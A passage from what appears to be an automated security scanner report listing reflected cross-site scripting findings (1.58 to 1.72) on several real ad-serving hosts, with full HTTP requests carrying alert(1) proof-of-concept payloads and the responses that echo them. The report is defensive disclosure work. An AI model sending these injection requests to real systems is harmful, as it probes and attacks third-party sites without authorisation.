The value of the AdId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25c14"><script>alert(1)</script>a4b96fa0e6e was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e;adiframe=y">
...[SNIP]...

1.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b69b0"><script>alert(1)</script>eeb789feb65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 280

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank;adiframe=y">
...[SNIP]...

1.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 566fc><script>alert(1)</script>ed3badced5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&566fc><script>alert(1)</script>ed3badced5a=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 327

<html><body><base target=_blank&566fc><script>alert(1)</script>ed3badced5a=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C1
...[SNIP]...

1.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87299"><script>alert(1)</script>d8233ba9cbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 329

<html><body><base target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1;adiframe=y">
...[SNIP]...

1.61. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f2f4"><script>alert(1)</script>fe7203a0cd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.62. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a3c"><script>alert(1)</script>9ea027e7c9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.63. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3700"><script>alert(1)</script>c1d53990b82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.64. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafad"><script>alert(1)</script>58e3214e0d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.65. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64130"><script>alert(1)</script>4aff41005f7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.66. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86bda"><script>alert(1)</script>f0041c3072b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.67. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd55"><script>alert(1)</script>94b70172a07 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.68. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c48c"><script>alert(1)</script>9172a92def1 was submitted in the cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1;adiframe=y">
...[SNIP]...

1.69. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd538"><script>alert(1)</script>254bcc5e869 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1;adiframe=y">
...[SNIP]...

1.70. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30ced"-alert(1)-"bb2604ed03b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=728x90&section=967562&30ced"-alert(1)-"bb2604ed03b=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/216/us/728x90/news?t=1297647385452&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:35 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 01:37:35 GMT
Pragma: no-cache
Content-Length: 4332
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?30ced"-alert(1)-"bb2604ed03b=1&Z=728x90&s=967562&_salt=1387362591";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

1.71. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3685f'-alert(1)-'4d88b1eaae was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 462
Date: Mon, 14 Feb 2011 01:38:23 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae">
...[SNIP]...

1.72. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 707c4'%3balert(1)//6d6a9985586 was submitted in the mpvc parameter. This input was echoed as 707c4';alert(1)//6d6a9985586 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

